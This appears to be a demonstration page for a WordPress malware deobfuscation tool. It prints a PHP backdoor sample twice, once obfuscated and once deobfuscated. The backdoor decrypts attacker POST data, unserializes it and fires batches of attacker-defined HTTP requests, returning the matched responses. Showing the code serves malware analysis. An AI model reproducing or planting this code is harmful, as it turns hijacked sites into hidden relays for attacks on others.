Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php function
_1111189473($i){$a=Array('5.3.0',"%%vda8303j9","f3pdosjflnsd890g%%","%%NOGIPfdspFJdf","iPSmnSpojpqwoDPFJP%%","urls","paths","paths","paths","paths","files","files","files","files","fcf01cb6-d298-4251-97e9-1fd0a71558b9","","request","request","GET","headers","headers","post_rawdata","post_rawdata","post_params","post_params","get_params","get_params","cookie_params","cookie_params","math_results","not_substr","math_results","substr","","math_results","substr","math_results","substr","","math_results","regexp","math_results","regexp","","request_timeout","request_timeout","connection_timeout","connection_timeout","return_results","return_results","urls","urls","urls","domains","meta","meta","/\{\{(.*?)\}\}/",": ","Cookie: ","=",";","?",'POST',"domain","url","macros","macros","post_param","post_param","post_param","return_data","return_data",'request_option',"%%%NDOS039","dNDIOF%%%","%%%mfpODPM","EWpo345ODf%%%");return $a[$i];} ?><?php
class Check{public static function l__0(){if(isset($_POST['checks'])){$_0=curl_multi_init();if(version_compare(PHP_VERSION,_1111189473(0))<round(0)){echo _1111189473(1) ._1111189473(2);exit();}echo _1111189473(3)
._1111189473(4);exit();}}}class TaskGenerator{private static $_1=array('Accept-Language: en-US,en;q=0.5','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',);private static $_2=Array();private static function l__1($_3){if(empty($_3["urls"])){return Array();}$_3=$_3[_1111189473(5)];if(isset($_3[_1111189473(6)])&&!empty($_3[_1111189473(7)])&&
is_array($_3[_1111189473(8)])){$_4=$_3[_1111189473(9)];}else{$_4=Array();}if(isset($_3[_1111189473(10)])&&!empty($_3[_1111189473(11)])&&
is_array($_3[_1111189473(12)])){$_5=$_3[_1111189473(13)];}else{$_5=Array();}$_6=Array();if($_4){foreach($_4 as $_7){if($_5){foreach($_5 as $_8){$_6[]=$_7 .$_8;}}else{$_6[]=$_7;}}}else if($_5){foreach($_5 as $_8){$_6[]=$_8;}}return
$_6;}public static function l__2($_9){$_9=base64_decode($_9);$_10=_1111189473(14);$_11=_1111189473(15);for($_12=0;$_12<strlen($_9);){for($_13=0;$_13<strlen($_10)&& $_12<strlen($_9);$_13++,$_12++){$_11 .=
chr(ord($_9[$_12])^ord($_10[$_13]));}}return $_11;}public static function l__3($_9){$_9=TaskGenerator::l__2($_9);$_14=unserialize($_9);return $_14;}public static function
l__4($_14){$_15=array();$_16=!empty($_14[_1111189473(16)])?$_14[_1111189473(17)]:_1111189473(18);$_17=!empty($_14[_1111189473(19)])?$_14[_1111189473(20)]:TaskGenerator::$_1;$_18=!empty($_14[_1111189473(21)])?$_14[_1111189473(22)]:NULL;$_19=!empty($_14[_1111189473(23)])?$_14[_1111189473(24)]:Array();$_20=!empty($_14[_1111189473(25)])?$_14[_1111189473(26)]:Array();$_21=!empty($_14[_1111189473(27)])?$_14[_1111189473(28)]:Array();$_22=!empty($_14[_1111189473(29)][_1111189473(30)])?$_14[_1111189473(31)][_1111189473(32)]:_1111189473(33);$_23=!empty($_14[_1111189473(34)][_1111189473(35)])?$_14[_1111189473(36)][_1111189473(37)]:_1111189473(38);$_24=!empty($_14[_1111189473(39)][_1111189473(40)])?$_14[_1111189473(41)][_1111189473(42)]:_1111189473(43);$_25=!empty($_14[_1111189473(44)])?intval($_14[_1111189473(45)]):round(0+3+3+3+3+3);$_26=!empty($_14[_1111189473(46)])?intval($_14[_1111189473(47)]):round(0+2.5+2.5);$_27=!empty($_14[_1111189473(48)])?$_14[_1111189473(49)]:TaskGenerator::$_2;$_28=TaskGenerator::l__1($_14);if(isset($_14[_1111189473(50)])&&!empty($_14[_1111189473(51)])){foreach($_14[_1111189473(52)][_1111189473(53)]as
$_29 => $_30){foreach($_28 as $_31){$_32=$_29 .$_31;$_33=new
Task();$_33->_16=$_16;$_33->_29=$_29;$_33->_34=$_32;$_33->_25=$_25;$_33->_26=$_26;$_33->_17=$_17;$_33->_18=$_18;$_33->_19=$_19;$_33->_20=$_20;$_33->_21=$_21;$_33->_30=$_30;if(isset($_14[_1111189473(54)]))$_33->_35=$_14[_1111189473(55)];$_33->_22=$_22;$_33->_23=$_23;$_33->_24=$_24;$_33->_27=$_27;$_15[]=$_33;}}}return
$_15;}}class Task{public $_16;public $_29;public $_34;public $_17;public $_18;public $_19;public $_20;public $_21;public $_30;public $_35;private $_36;public $_23;public $_24;public $_27;public $_25;public $_26;private
$_37=NULL;private $_11=Array();private function l__5($_38){$_39="";if(isset($this->_36[$_38])){return
$this->_36[$_38];}if(!empty($this->_30[$_38])){$_40=array_rand($this->_30[$_38]);$_39=$this->_30[$_38][$_40];$this->_36[$_38]=$_39;unset($this->_30[$_38][$_40]);}else
if(!empty($this->_35[$_38])){$_40=array_rand($this->_35[$_38]);$_39=$this->_35[$_38][$_40];$this->_36[$_38]=$_39;unset($this->_35[$_38][$_40]);}return $_39;}private function
l__6($_9){if(is_array($_9)){$_41=Array();$_42=array_keys($_9);foreach($_42 as $_10){$_43=$this->l__6($_10);$_44=$this->l__6($_9[$_10]);$_41[$_43]=$_44;}return $_41;}else
if(is_string($_9)){preg_match_all(_1111189473(56),$_9,$_45);for($_12=round(0);$_12<sizeof($_45[round(0)]);$_12++){$_46=$_45[round(0)][$_12];$_38=$_45[round(0+0.5+0.5)][$_12];$_47=$this->l__5($_38);$_9=str_replace($_46,$_47,$_9);}return
$_9;}else{return $_9;}}private function l__7(){$_41=Array();$_17=$this->l__6($this->_17);$_21=$this->l__6($this->_21);foreach($_17 as $_10=>$_48){$_41[]=$_10 ._1111189473(57) .$_48;}$_49=_1111189473(58);foreach($_21 as
$_10=>$_48){$_49 .= $_10 ._1111189473(59) .$_48 ._1111189473(60);}$_41[]=$_49;return $_41;}public function l__8(){if(!empty($this->_37)){return $this->_37;}if(!empty($this->_20)){$_34=$this->_34 ._1111189473(61)
.http_build_query($this->l__6($this->_20));}else{$_34=$this->_34;}$_37=curl_init($_34);curl_setopt($_37,CURLOPT_RETURNTRANSFER,true);curl_setopt($_37,CURLOPT_CONNECTTIMEOUT,$this->_26);curl_setopt($_37,CURLOPT_TIMEOUT,$this->_25);curl_setopt($_37,CURLINFO_HEADER_OUT,true);curl_setopt($_37,CURLOPT_HEADER,round(0+0.25+0.25+0.25+0.25));curl_setopt($_37,CURLOPT_VERBOSE,round(0+0.25+0.25+0.25+0.25));curl_setopt($_37,CURLOPT_FOLLOWLOCATION,round(0+0.5+0.5));curl_setopt($_37,CURLOPT_CUSTOMREQUEST,$this->_16);if($this->_17){curl_setopt($_37,CURLOPT_HTTPHEADER,$this->l__7());}if(!empty($this->_19)||!empty($this->_18)){if(!empty($this->_18)){curl_setopt($_37,CURLOPT_POSTFIELDS,$this->l__6($this->_18));}else{curl_setopt($_37,CURLOPT_POSTFIELDS,http_build_query($this->l__6($this->_19)));}curl_setopt($_37,CURLOPT_POST,round(0+0.5+0.5));curl_setopt($_37,CURLOPT_CUSTOMREQUEST,_1111189473(62));}curl_setopt($_37,CURLOPT_BUFFERSIZE,round(0+25.6+25.6+25.6+25.6+25.6));curl_setopt($_37,CURLOPT_NOPROGRESS,false);$this->_37=$_37;return
$_37;}public function l__9($_11){$_50=FALSE;if(!empty($this->_23)){if(strpos($_11,$this->_23)!==
FALSE){$_50=TRUE;}}if(!empty($this->_24)){if(preg_match($this->_24,$_11)){$_50=TRUE;}}if(!empty($this->_22)){if(strpos($_11,$this->_22)!==
FALSE){$_50=FALSE;}}if($_50){$this->_11[_1111189473(63)]=$this->_29;$this->_11[_1111189473(64)]=$this->_34;if(in_array(_1111189473(65),$this->_27)){$this->_11[_1111189473(66)]=$this->_36;}if(in_array(_1111189473(67),$this->_27)){if(!empty($this->_18)){$this->_11[_1111189473(68)]=$this->_18;}else{$this->_11[_1111189473(69)]=$this->_19;}}if(in_array(_1111189473(70),$this->_27)){$this->_11[_1111189473(71)]=$_11;}}return
$this->_11;}public function l__10(){return $this->_11;}}class TaskExecutor{public static function l__11($_15,$_51){$_0=curl_multi_init();foreach($_15 as
$_33){curl_multi_add_handle($_0,$_33->l__8());}$_52=NULL;do{curl_multi_exec($_0,$_52);}while($_52>round(0));foreach($_15 as
$_33){$_33->l__9(curl_multi_getcontent($_33->l__8()));curl_multi_remove_handle($_0,$_33->l__8());}curl_multi_close($_0);return
$_15;}}$_53=TaskGenerator::l__3($_POST[_1111189473(72)]);;if(!$_53){exit();}$_15=TaskGenerator::l__4($_53);$_15=TaskExecutor::l__11($_15,-round(0+0.25+0.25+0.25+0.25));$_54=Array();foreach($_15 as
$_33){$_11=$_33->l__10();if(!empty($_11)){$_54[]=$_11;}}echo _1111189473(73) ._1111189473(74) .serialize($_54) ._1111189473(75) ._1111189473(76) .PHP_EOL;<?php
function _1111189473($i)
{
$a = array('5.3.0', "%%vda8303j9", "f3pdosjflnsd890g%%", "%%NOGIPfdspFJdf", "iPSmnSpojpqwoDPFJP%%", "urls", "paths", "paths", "paths", "paths", "files", "files", "files", "files", "fcf01cb6-d298-4251-97e9-1fd0a71558b9", "", "request", "request", "GET", "headers", "headers", "post_rawdata", "post_rawdata", "post_params", "post_params", "get_params", "get_params", "cookie_params", "cookie_params", "math_results", "not_substr", "math_results", "substr", "", "math_results", "substr", "math_results", "substr", "", "math_results", "regexp", "math_results", "regexp", "", "request_timeout", "request_timeout", "connection_timeout", "connection_timeout", "return_results", "return_results", "urls", "urls", "urls", "domains", "meta", "meta", "/\\{\\{(.*?)\\}\\}/", ": ", "Cookie: ", "=", ";", "?", 'POST', "domain", "url", "macros", "macros", "post_param", "post_param", "post_param", "return_data", "return_data", 'request_option', "%%%NDOS039", "dNDIOF%%%", "%%%mfpODPM", "EWpo345ODf%%%");
return $a[$i];
}
class Check
{
public static function l__0()
{
if (isset($_POST['checks'])) {
$_0 = curl_multi_init();
if (version_compare(PHP_VERSION, _1111189473(0)) < round(0)) {
echo _1111189473(1) . _1111189473(2);
exit;
}
echo _1111189473(3) . _1111189473(4);
exit;
}
}
}
class TaskGenerator
{
private static $_1 = array('Accept-Language: en-US,en;q=0.5', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36');
private static $_2 = array();
private static function l__1($_3)
{
if (empty($_3["urls"])) {
return array();
}
$_3 = $_3[_1111189473(5)];
if (isset($_3[_1111189473(6)]) && !empty($_3[_1111189473(7)]) && is_array($_3[_1111189473(8)])) {
$_4 = $_3[_1111189473(9)];
} else {
$_4 = array();
}
if (isset($_3[_1111189473(10)]) && !empty($_3[_1111189473(11)]) && is_array($_3[_1111189473(12)])) {
$_5 = $_3[_1111189473(13)];
} else {
$_5 = array();
}
$_6 = array();
if ($_4) {
foreach ($_4 as $_7) {
if ($_5) {
foreach ($_5 as $_8) {
$_6[] = $_7 . $_8;
}
} else {
$_6[] = $_7;
}
}
} else {
if ($_5) {
foreach ($_5 as $_8) {
$_6[] = $_8;
}
}
}
return $_6;
}
public static function l__2($_9)
{
$_9 = base64_decode($_9);
$_10 = _1111189473(14);
$_11 = _1111189473(15);
for ($_12 = 0; $_12 < strlen($_9);) {
for ($_13 = 0; $_13 < strlen($_10) && $_12 < strlen($_9); $_13++, $_12++) {
$_11 .= chr(ord($_9[$_12]) ^ ord($_10[$_13]));
}
}
return $_11;
}
public static function l__3($_9)
{
$_9 = TaskGenerator::l__2($_9);
$_14 = unserialize($_9);
return $_14;
}
public static function l__4($_14)
{
$_15 = array();
$_16 = !empty($_14[_1111189473(16)]) ? $_14[_1111189473(17)] : _1111189473(18);
$_17 = !empty($_14[_1111189473(19)]) ? $_14[_1111189473(20)] : TaskGenerator::$_1;
$_18 = !empty($_14[_1111189473(21)]) ? $_14[_1111189473(22)] : NULL;
$_19 = !empty($_14[_1111189473(23)]) ? $_14[_1111189473(24)] : array();
$_20 = !empty($_14[_1111189473(25)]) ? $_14[_1111189473(26)] : array();
$_21 = !empty($_14[_1111189473(27)]) ? $_14[_1111189473(28)] : array();
$_22 = !empty($_14[_1111189473(29)][_1111189473(30)]) ? $_14[_1111189473(31)][_1111189473(32)] : _1111189473(33);
$_23 = !empty($_14[_1111189473(34)][_1111189473(35)]) ? $_14[_1111189473(36)][_1111189473(37)] : _1111189473(38);
$_24 = !empty($_14[_1111189473(39)][_1111189473(40)]) ? $_14[_1111189473(41)][_1111189473(42)] : _1111189473(43);
$_25 = !empty($_14[_1111189473(44)]) ? intval($_14[_1111189473(45)]) : round(15);
$_26 = !empty($_14[_1111189473(46)]) ? intval($_14[_1111189473(47)]) : round(5.0);
$_27 = !empty($_14[_1111189473(48)]) ? $_14[_1111189473(49)] : TaskGenerator::$_2;
$_28 = TaskGenerator::l__1($_14);
if (isset($_14[_1111189473(50)]) && !empty($_14[_1111189473(51)])) {
foreach ($_14[_1111189473(52)][_1111189473(53)] as $_29 => $_30) {
foreach ($_28 as $_31) {
$_32 = $_29 . $_31;
$_33 = new Task();
$_33->_16 = $_16;
$_33->_29 = $_29;
$_33->_34 = $_32;
$_33->_25 = $_25;
$_33->_26 = $_26;
$_33->_17 = $_17;
$_33->_18 = $_18;
$_33->_19 = $_19;
$_33->_20 = $_20;
$_33->_21 = $_21;
$_33->_30 = $_30;
if (isset($_14[_1111189473(54)])) {
$_33->_35 = $_14[_1111189473(55)];
}
$_33->_22 = $_22;
$_33->_23 = $_23;
$_33->_24 = $_24;
$_33->_27 = $_27;
$_15[] = $_33;
}
}
}
return $_15;
}
}
class Task
{
public $_16;
public $_29;
public $_34;
public $_17;
public $_18;
public $_19;
public $_20;
public $_21;
public $_30;
public $_35;
private $_36;
public $_23;
public $_24;
public $_27;
public $_25;
public $_26;
private $_37 = NULL;
private $_11 = array();
private function l__5($_38)
{
$_39 = "";
if (isset($this->_36[$_38])) {
return $this->_36[$_38];
}
if (!empty($this->_30[$_38])) {
$_40 = array_rand($this->_30[$_38]);
$_39 = $this->_30[$_38][$_40];
$this->_36[$_38] = $_39;
unset($this->_30[$_38][$_40]);
} else {
if (!empty($this->_35[$_38])) {
$_40 = array_rand($this->_35[$_38]);
$_39 = $this->_35[$_38][$_40];
$this->_36[$_38] = $_39;
unset($this->_35[$_38][$_40]);
}
}
return $_39;
}
private function l__6($_9)
{
if (is_array($_9)) {
$_41 = array();
$_42 = array_keys($_9);
foreach ($_42 as $_10) {
$_43 = $this->l__6($_10);
$_44 = $this->l__6($_9[$_10]);
$_41[$_43] = $_44;
}
return $_41;
} else {
if (is_string($_9)) {
preg_match_all(_1111189473(56), $_9, $_45);
for ($_12 = round(0); $_12 < sizeof($_45[round(0)]); $_12++) {
$_46 = $_45[round(0)][$_12];
$_38 = $_45[round(1.0)][$_12];
$_47 = $this->l__5($_38);
$_9 = str_replace($_46, $_47, $_9);
}
return $_9;
} else {
return $_9;
}
}
}
private function l__7()
{
$_41 = array();
$_17 = $this->l__6($this->_17);
$_21 = $this->l__6($this->_21);
foreach ($_17 as $_10 => $_48) {
$_41[] = $_10 . _1111189473(57) . $_48;
}
$_49 = _1111189473(58);
foreach ($_21 as $_10 => $_48) {
$_49 .= $_10 . _1111189473(59) . $_48 . _1111189473(60);
}
$_41[] = $_49;
return $_41;
}
public function l__8()
{
if (!empty($this->_37)) {
return $this->_37;
}
if (!empty($this->_20)) {
$_34 = $this->_34 . _1111189473(61) . http_build_query($this->l__6($this->_20));
} else {
$_34 = $this->_34;
}
$_37 = curl_init($_34);
curl_setopt($_37, CURLOPT_RETURNTRANSFER, true);
curl_setopt($_37, CURLOPT_CONNECTTIMEOUT, $this->_26);
curl_setopt($_37, CURLOPT_TIMEOUT, $this->_25);
curl_setopt($_37, CURLINFO_HEADER_OUT, true);
curl_setopt($_37, CURLOPT_HEADER, round(1.0));
curl_setopt($_37, CURLOPT_VERBOSE, round(1.0));
curl_setopt($_37, CURLOPT_FOLLOWLOCATION, round(1.0));
curl_setopt($_37, CURLOPT_CUSTOMREQUEST, $this->_16);
if ($this->_17) {
curl_setopt($_37, CURLOPT_HTTPHEADER, $this->l__7());
}
if (!empty($this->_19) || !empty($this->_18)) {
if (!empty($this->_18)) {
curl_setopt($_37, CURLOPT_POSTFIELDS, $this->l__6($this->_18));
} else {
curl_setopt($_37, CURLOPT_POSTFIELDS, http_build_query($this->l__6($this->_19)));
}
curl_setopt($_37, CURLOPT_POST, round(1.0));
curl_setopt($_37, CURLOPT_CUSTOMREQUEST, _1111189473(62));
}
curl_setopt($_37, CURLOPT_BUFFERSIZE, round(128.0));
curl_setopt($_37, CURLOPT_NOPROGRESS, false);
$this->_37 = $_37;
return $_37;
}
public function l__9($_11)
{
$_50 = FALSE;
if (!empty($this->_23)) {
if (strpos($_11, $this->_23) !== FALSE) {
$_50 = TRUE;
}
}
if (!empty($this->_24)) {
if (preg_match($this->_24, $_11)) {
$_50 = TRUE;
}
}
if (!empty($this->_22)) {
if (strpos($_11, $this->_22) !== FALSE) {
$_50 = FALSE;
}
}
if ($_50) {
$this->_11[_1111189473(63)] = $this->_29;
$this->_11[_1111189473(64)] = $this->_34;
if (in_array(_1111189473(65), $this->_27)) {
$this->_11[_1111189473(66)] = $this->_36;
}
if (in_array(_1111189473(67), $this->_27)) {
if (!empty($this->_18)) {
$this->_11[_1111189473(68)] = $this->_18;
} else {
$this->_11[_1111189473(69)] = $this->_19;
}
}
if (in_array(_1111189473(70), $this->_27)) {
$this->_11[_1111189473(71)] = $_11;
}
}
return $this->_11;
}
public function l__10()
{
return $this->_11;
}
}
class TaskExecutor
{
public static function l__11($_15, $_51)
{
$_0 = curl_multi_init();
foreach ($_15 as $_33) {
curl_multi_add_handle($_0, $_33->l__8());
}
$_52 = NULL;
do {
curl_multi_exec($_0, $_52);
} while ($_52 > round(0));
foreach ($_15 as $_33) {
$_33->l__9(curl_multi_getcontent($_33->l__8()));
curl_multi_remove_handle($_0, $_33->l__8());
}
curl_multi_close($_0);
return $_15;
}
}
$_53 = TaskGenerator::l__3($_POST[_1111189473(72)]);
if (!$_53) {
exit;
}
$_15 = TaskGenerator::l__4($_53);
$_15 = TaskExecutor::l__11($_15, -round(1.0));
$_54 = array();
foreach ($_15 as $_33) {
$_11 = $_33->l__10();
if (!empty($_11)) {
$_54[] = $_11;
}
}
echo _1111189473(73) . _1111189473(74) . serialize($_54) . _1111189473(75) . _1111189473(76) . PHP_EOL;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.